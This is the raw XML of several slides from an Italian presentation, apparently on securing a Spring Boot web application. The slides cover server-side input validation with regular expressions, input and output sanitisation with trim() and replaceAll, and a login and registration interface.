      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3554277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dati in input client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475FB977-0E3E-C6DA-2876-E3B634996BC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="788686" y="2385892"/>
            <a:ext cx="4855494" cy="2939341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B04B70-9924-977A-BB3A-3A4B8AD7C405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="52998"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346496" y="2839212"/>
            <a:ext cx="4856684" cy="1179576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7BF5F89-2C81-47AE-4166-88344012C2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193557" y="4861428"/>
            <a:ext cx="5776122" cy="695405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2029985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server side </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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Anche per la validazione lato server sono state utilizzate le espressioni regolari. In particolare è stato utilizzato il metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> della classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è stata estesa nella versione 1.4 per fornire un metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> che esegue il confronto dei modelli delle espressioni regolari. Questo metodo internamente utilizza le classi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Matcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> delle espressioni regolari di Java per elaborare i confronti, ma riduce il numero di linee di codice necessarie per eseguire l'operazione.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il metodo matches confronta la stringa in input con il pattern definito dall’espressione regolare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Restituisce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> se c’è una corrispondenza esatta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Restituisce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> se non c’è una corrispondenza esatta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3597429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server side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33154FA7-27E8-BBFE-0753-EE804504C88A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2180493"/>
            <a:ext cx="5661950" cy="3689183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDD66A9-1CD4-5596-2F4F-F2CF584B9A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491089" y="3722344"/>
            <a:ext cx="6239798" cy="2814881"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133717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Validazione input server side</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La validazione del file lato client da sola non basta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> ma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>deve essere affiancata alla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> validazione lato server è essenziale per prevenire potenziali manipolazioni o attacchi da parte di utenti malevoli.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53747AF1-D997-FEDE-E019-E354C166DDD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297520" y="3232726"/>
            <a:ext cx="6211420" cy="1817546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, schermata, biglietto da visita, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB329481-D12D-4ABB-D100-6A623DD01B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="4322" t="1694" r="11240" b="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157881" y="4884284"/>
            <a:ext cx="5522324" cy="1662473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180644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Sanitizzazione input server side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9727977-C439-C200-172C-F8BCBC56A142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La sanitizzazione di stringhe in Spring Boot è una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buona pratica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>per rimuovere caratteri indesiderati o non validi da un input fornito dall'utente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>trim() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>per rimuovere eventuali spazi vuoti all'inizio e alla fine della stringa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>il metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(…) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>per rimuovere i caratteri non desiderati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("[^A-Za-z0-9 ]", "")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> rimuove tutti i caratteri che non sono lettere (sia maiuscole che minuscole), numeri o spazi dalla stringa. Ciò significa che tutti i caratteri speciali o non alfanumerici vengono eliminati.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("[^0-9.]", "")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> rimuove tutti i caratteri che non sono numeri o il carattere di punto decimale dalla stringa. Ciò significa che tutti i caratteri non numerici, inclusi lettere e caratteri speciali, vengono eliminati, mantenendo solo il numero e il carattere del punto decimale.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252257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Sanitizzazione input server side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9348E6FD-41DF-1FED-ECB8-854F011A043A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="803214" y="2203262"/>
            <a:ext cx="7852626" cy="3694112"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160EE4D6-8C12-0D13-EB16-4C499E5E7295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132001" y="5236637"/>
            <a:ext cx="6532777" cy="1321474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1624650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Sanitizzazione output server side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5371755" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La sanitizzazione dei dati in output risulta fondamentale per garantire la sicurezza dell’applicazione e aiuta a prevenire attacchi XSS. Sono state applicate, ai dati in output, prima di trasmetterli al client le stesse funzioni di sanitizzazione dei dati in input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Applicando la sanitizzazione dei dati in output, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>si evita </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>che eventuali caratteri indesiderati o non validi vengano visualizzati e interpretati correttamente dal client. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene pianta da appartamento, vaso da fiori, vaso, testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D38D40-5F15-A735-7A0B-703A0F6F738C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6487323" y="2478024"/>
            <a:ext cx="4796373" cy="3823681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3240475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UI Login e Registrazione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 8" descr="Immagine che contiene testo, schermata, illustrazione, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A68EDB6-EB21-BF71-8DD2-AC14F8D834C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="953354" y="2454939"/>
            <a:ext cx="5491694" cy="2788393"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
